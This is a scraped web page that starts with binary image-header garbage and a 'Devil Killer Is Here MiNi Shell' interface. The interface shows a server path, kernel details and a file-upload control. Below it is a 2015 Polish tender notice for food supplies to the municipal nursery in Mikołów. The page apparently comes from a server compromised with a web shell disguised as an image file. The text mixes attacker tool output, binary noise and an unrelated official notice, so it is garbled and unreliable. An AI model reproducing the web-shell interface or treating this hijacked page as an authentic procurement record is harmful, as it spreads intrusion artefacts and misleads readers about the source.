JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151203/329862-N-2015.html

<p class="kh_header"><b>Mikołów: Zakup i sukcesywna dostawa żywności do Żłobka Miejskiego im. Tadeusza Więcka w Mikołowie</b><br>
<b>Numer ogłoszenia: 329862 - 2015; data zamieszczenia: 03.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Żłobek Miejski im. Tadeusza Więcka , Ul. Krakowska 30, 43-190 Mikołów, woj. śląskie, tel. 0323273027, faks 0323273027.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlobek.mikolow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i sukcesywna dostawa żywności do Żłobka Miejskiego im. Tadeusza Więcka w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa żywności do Żłobka Miejskiego im. Tadeusza Więcka w Mikołowie. 

Część I- PRODUKTY  MLECZARSKIE


Część II- PIECZYWO


Część III- PRODUKTY SYPKIE , PRZYPRAWY , DŻEMY , WODA MINERALNA


Część IV- RYBY


Część V- MROŻONKI


Część VI- DRÓB
CPV: 15.11.20.00-6

Część VII- MIĘSO, WĘDLINY



Część VIII- WARZYWA I OWOCE


Część IX- PRODUKTY DLA NIEMOWLĄT


Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr A do siwz..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.81.10.00-6, 15.80.00.00-6, 15.98.10.00-8, 15.22.10.00-3, 15.24.10.00-9, 15.33.11.70-9, 15.11.20.00-6, 15.13.11.30-5, 15.00.00.00-1, 15.88.40.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlobek.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Żłobek Miejski w Mikołowie im. Tadeusza Więcka ul. Krakowska 30, 43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 10:00, miejsce: Żłobek Miejski w Mikołowie im. Tadeusza Więcka ul. Krakowska 30, 43-190 Mikołów, pok nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Ministra Pracy i Polityki Społecznej w ramach Resortowego programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 Maluch - edycja 2015.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I- PRODUKTY  MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mleko krowie 3,2%  poj. min 2 litr	litr	1600
2.	Śmietana 18% nie mniej niż 400 g kwaśna	szt.	50
3.	Śmietanka 30% nie mniej niż 200g  słodka	szt.	330
4.	Jogurt naturalny bez cukru kubek  nie mniej niż 380g  nie więcej niż 400g	szt.	150
5.	Maślanka  naturalna  poj. min 1l	litr	30
6.	Twaróg  półtłusty pakowany nie mniej niż  0.25kg w pergamin zawartość tłuszczu  nie mniej niż 3,5%	Szt.	700
7.	Ser żółty zawartość tłuszczu min. 26% ; zawartość białka  min. 25%podpuszczkowy , dojrzewający typu holenderskiego	kg	100
8.	Masło extra min 200g maks. 250 g zaw. tłuszczu min.82%	szt	3200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II- PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb zwykły krojony(min 900g)	szt.	550
2.	Chleb wieloziarnisty(min 400g)	szt.	550
3.	Chleb sojowo -dyniowy(min 400g)	szt.	550
4.	Chleb żytni (100% mąki żytniej)	szt.	30
5.	Chałka półcukiernicza(min 500g)	szt.	70
6.	Babka piaskowa duża(min 500g)	szt.	200
7.	Babka drożdżowa duża (min 500g)	szt.	70
8	Mufiny małe  z marmoladą wieloowocową ( min 50g) 	szt.	1800
9.	Baton wrocławski(min 350g)	szt.	2000
10.	Groszek ptysiowy	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III- PRODUKTY SYPKIE , PRZYPRAWY , DŻEMY , WODA MINERALNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bazylia sucha min 15g	szt.	85
2.	Bułka tarta min 500g	szt.	60
3.	Ciastka kruche zawartość tłuszczu w 100g maks.19%,cukru 21%, opakowania 2000g do 2500g.	kg	15
4.	Cukier biały	kg	600
5	Cukier puder min 500g	szt.	25
6.	Cukier waniliowy min 16g	szt.	300
7.	Cynamon mielony min 25g	szt.	20
8.	Dżem niskosłodzony truskawkowy, wiśniowy z zawartością  owoców
w 100g min. 40 g ; słoik min. 450g,	szt.	250
9.	Galaretka owocowa wiśniowa, truskawkowa, malinowa min.75g	szt.	100
10.	Herbata czarna ekspresowa opakowanie min. 100 torebek	szt.	100
11.	Herbata owocowa ekspresowa min.40g,smak malinowy ,owoce leśne	szt.	400
12.	Jajka świeże L	szt.	2600
13.	Kakao zwykłe min.80g  extra  ciemne, zawartość tłuszczu kakaowego max 12% 	szt.	50
14.	Kasza manna 100% kaszy 
z pszenicy min 400g.	szt.	150
15.	Kasza perłowa  jęczmienna             średnia min 400g	szt.	220
16.	Kasza jaglana min 400g	szt.	80
17.	Kasza  gryczana biała min 400g.	szt.	280
18.	Kakao Puchatek	szt.	25
19.	Kawa zbożowa expresowa min.40g	szt.	10
20.	Tymianek suszony min 15g
 	szt..	20
21.	Kminek cały min 20g	szt.	10
22.	Kukurydza w puszce min 200g
	szt.	10
23.	Koncentrat pomidorowy 30%,sloik szklany min 200g	szt.	30
24.	Koncentrat pomidorowy 30%, słoik szklany min 900g.	szt.	100
26.	Kwasek cytrynowy  min 20g	szt.	30
27.	Liść laurowy min 20g	szt.	30
28.	Lubczyk otarty  min 20g	szt.	250
29.	Majeranek  otarty min 15g	szt.	80
30.	Makaron  gruby świderki min 500g 	szt.	400
31.	Makaron nitki cztero-jajeczny min 250g	szt.	200
32.	Mąka pszenna typ -550	kg	200
33.	Mąka ziemniaczana100% skrobi ziemniaczanej	kg	70
34.	Miód  pszczeli wielokwiatowy  słoik min.900g	szt.	120
35.	Musztarda  stołowa min 200g	szt.	30
36.	Ocet  spirytusowy 10%  min 500g	szt.	10
37.	Olej rzepakowy min 1000g	szt.	270
38.	Oregano  suszone min 15g	szt.	50
39.	Papryka słodka mielona  min 20g	szt.	300
40.	Pieprz  czarny mielony min 20g.	szt.	100
41.	Proszek do pieczenia min 20g	szt.	60
42.	Ryż  biały	kg	100
43.	Syrop  pasteryzowany, malinowy,
bez konserwantów butelka min.440ml	szt. 	50
44.	Sól morska	kg	50
45.	Ziele angielskie  całe min 20g	szt.	90
46.	Woda źródlana niegazowana min 1500g  	szt.	300
47.	Woda źródlana gazowana min 1500g 	szt.	80
48.	Chleb bezglutenowy , tostowy; bez glutenu, bez jaj, bez czekolady, bez soi w składzie m.in. skrobia pszenna bezglutenowa, skrobia kukurydziana, mąka ryżowa, mąka 
kukurydziana ; pakowany próżniowo , opakowanie min. 400g	szt.	5
49.	Makaron bezglutenowy  , kukurydziany ; skład 100% mąki kukurydzianej ; opakowanie min. 500g	szt.	20
50.	Makaron bezglutenowy  , ryżowy ; skład 100% mąki ryżowej ; opakowanie min. 500g	szt.	3
51.	Herbatka rozpuszczalna, granulowana po 4 miesiącu  ,o smaku kopru włoskiego, puszki o poj. min.200g	szt.	4
52.	Herbatka rozpuszczalna, granulowana po 4 miesiącu  , jabłkowa z  melisą,  puszki  o poj. min.200g	szt.	8
53.	Herbatka rozpuszczalna, granulowana po  6 miesiącu  o smaku maliny z dziką różą , pakowana w puszki  o poj. min.400g	szt.	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV- RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mintaj filet klasa 1 bez polifosforanów ; max.2%glazury	kg	280
2.	Dorsz filet mrożony klasa 1 bez polifosforanów; max 2% glazury	kg	170
3.	Tuńczyk w sosie własnym w kawałkach(min 170g) puszka	szt.	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V- MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Truskawka mrożona klasa 1 min 2500g	szt.	20
2.	Brukselka mrożona klasa1 min 2500g 	szt.	20
3.	Brokuł mrożony różyczki klasa 1 2500g	szt.	70
4.	Szpinak liść mrożony klasa 1   min 2500g	szt.	30
5.	Bukiet warzyw 7-składnikowa klasa 1  ; min 2500g	szt.	60
6.	Włoszczyzna paski marchew, seler, pietruszka, por klasa 1 2500g	szt.	280
7.	Fasolka szparagowa cięta mrożona klasa 1  ; min 2500g	szt.	20
8.	Kalafior różyczki mrożony klasa 1 ; min 2500g.	szt.	60
9.	Groszek zielony mrożony klasa 1  min 2500g	szt.	60
10.	Wiśnie bez pestek mrożone klasa 1  min 2500g	szt.	5
11.	Mieszanka kompotowa co najmniej 5-składnikowa ( np. truskawka, porzeczka czarna ,czerwona, wiśnia, agrest)  składnikowa klasa 1  min 2500g	szt.	260
12.	Barszcz ukraiński klasa 1 ; marchew, seler ,pietruszka, por , buraki ; min 2500g.	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI- DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kurczak świeży min.2 kg szt.	kg	5
2.	Filet kurczaka bez skóry ,bez kości	kg	420
3.	Porcje rosołowe z kurczaka	kg	340
4.	Filet z indyka bez skóry, bez kości	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII- MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Schab b/k	kg	100
2.	Łopatka wieprzowa b/k bez skóry	kg	800
3.	Kita wieprzowa b/k, bez skóry	kg	100
4.	Szynka wieprzowa , gotowana min.85%	kg	150
5.	Polędwica wieprzowa typu sopocka
min.85% mięsa	kg	150
6.	Polędwica drobiowa min.60% mięsa	kg	95
7.	Kiełbasa gruba typ kanapkowa gatunek dębicka min.80% mięsa	kg	90
8.	Boczek wędzony bez  skóry, bez żeber chudy	kg	8
9.	Kiełbasa cienka min 100g   szt. typu śląska min.70% mięsa	kg	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII- WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Arbuz słodki , czerwony	kg	100
2.	Banany żółte	kg	450
3.	Botwina min.1200g pęczek	szt.	60
4.	Brokuł  świeży min.1500g szt.	szt.	80
5.	Buraki czerwone średnie	kg	300
6.	Cebula zwyczajna	kg	200
7.	Cytryna	kg	45
8.	Czosnek nieulegający pleśnieniu, 
o intensywnym zapachu	szt.	250
9.	Fasola szparagowa świeża	kg	30
10.	Gruszki konferencja	kg	250
11.	Jabłka sezonowe : papierówka . lobo , kortland	kg	450
12.	Kalafior świeży	szt.	100
13.	Kalarepa	szt.	60
14.	Kapusta biała młoda	szt.	70
15.	Kapusta biała 	kg	120
16.	Kapusta czerwona młoda	szt.	25
17.	Kapusta czerwona	kg	90
18.	Kapusta kiszona 	kg	160
19.	Kapusta pekińska	kg	100
20.	Kapusta włoska	szt.	15
21.	Koperek min.50g pęczek	pęczek	700
22.	Malinymin 500g	szt.	25
23.	Mandarynki	kg	100
24.	Marchewka	kg	300
25.	Ogórki kiszone   	kg	120
26.	Ogórki zielone	kg	90
27.	Pietruszka korzeń	kg	20
28.	Pomidory	kg	100
29.	Por	szt.	350
30.	Rzodkiewka	pęczek	50
31.	Seler	kg	5
32.	Szczypiorek	szt.	40
33.	Śliwki 	kg	20
34.	Wiśnie	kg	10
35.	Truskawki świeże	kg	90
36.	Zielona pietruszka min. 50g pęczek	pęczek	800
37.	Ziemniaki	kg	3500
38.	Kiwi	szt.	200

39.
	Papryka czerwona słodka	kg.	10
40.	Pieczarka biała	kg.	5
41.	Cukinia	kg.	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX- PRODUKTY DLA NIEMOWLĄT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko następne dla niemowląt 
powyżej 6 miesiąca życia; 2 ;  skład 
kompozycja prebiotyków (fruktooligosacharydów , galaktooligosacharydów i błonnika),
witaminy , niezawierające dodatków zbożowych i glutenu opakowanie kartonowe, min.800 g	szt.	4
Kaszka mleczno - ryżowa po 4 miesiącu - skład min. 39% mąki ryżowej , min.32% odtłuszczonego mleka , witaminy min. 8 , składniki mineralne , smaki bananowa, jabłkowa ; opakowanie min. 230 g	szt.	30
Kaszka mleczno - ryżowa po 6 miesiącu - skład min. 39% mąki ryżowej , min.32% odtłuszczonego mleka , witaminy min. 9 , składniki mineralne , różne smaki np. bananowa , jabłkowa ; opakowanie 
min. 230 g	szt.	30
Kaszka ryżowa po 6 miesiącu - skład min. 75% mąki ryżowej , min.32% odtłuszczonego mleka , witaminy min. 9 , składniki mineralne , różne smaki np. malinowy , truskawkowy  ; opakowanie 
min. 180 g	szt.	30
Bezglutenowy produkt zbożowy
( kaszka) nie zawierający mleka krowiego , 
białka sojowego , laktozy , glutenu ; skład : 
ryż , mąka chleba świętojańskiego , witaminy , 
składniki mineralne ; opakowanie min.500g	szt.	5
Mleko następne dla niemowląt 
powyżej 6 miesiąca życia; dietetyczny środek spożywczy specjalnego przeznaczenia 2 ; 
dla niemowląt z tendencją do kolek i zaparć ; 
z obniżoną zawartością laktozy , zawierający 
nukleotydy ; puszka min. 400 g	szt.	5
koncentrat hydrolizowanego białka serwatkowego z mleka, laktoza z mleka, oleje roślinne (palmowy, rzepakowy, kokosowy, słonecznikowy, z organizmów jednokomórkowych) skroskrobia, galaktooligosacharydy z mleka (8,12%), fruktooligosacharydy (0,57%), mono- i diglicerydy kwasów tłuszczowych estryfikowane kwasem cytrynowym (emulgator), dwuwodorofosforan potasowy, chlorek wapnia, fosforan wapnia, olej rybi, chlorek choliny, kwas L- askorbinowy, tauryna, lecytyna sojowa, L-askorbinian sodu, siarczan żelazawy, octan DL-alfa-tokoferolu, siarczan cynku, inozytol, sól sodowa 5-monofosforanu urydyny, 5-monofosforan cytydyny, 5-monofosforan adenozyny, sól sodowa 5-monofosforanu inozyny, L-karnityna, nikotynamid, sól sodowa 5-monofosforanu uanozyny, D-pantotenian wapnia, D-biotyna, siarczan miedzi, palmitynian retinylu kwas foliowy, DL-alfa-tokoferol, ryboflawina, chlorowodorek tiaminy, cholekalcyferol, chlorowodorek pirydoksyny, jodek potasu, siarczan manganu, fitomenadion, selenin sodu  opakowanie min.400 g
	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.40.00-8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas konieczny na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
